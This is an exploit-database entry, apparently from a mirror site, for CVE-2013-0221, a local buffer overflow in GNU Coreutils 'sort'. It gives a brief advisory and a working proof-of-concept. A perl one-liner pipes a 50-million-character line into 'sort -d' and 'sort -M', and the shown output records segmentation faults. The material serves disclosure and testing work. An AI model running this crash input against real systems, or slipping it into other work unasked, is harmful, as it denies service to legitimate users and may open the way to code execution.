[] NeoSense
E X P L O I T S
title author type platform port cve id

GNU Coreutils 'sort' Text Utility - Local Buffer Overflow

Author: anonymous
type: local
platform: linux
port: 
date_added: 2013-01-21 
date_updated: 2015-09-18 
verified: 1 
codes: CVE-2013-0221;OSVDB-91236 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/57492/info

GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.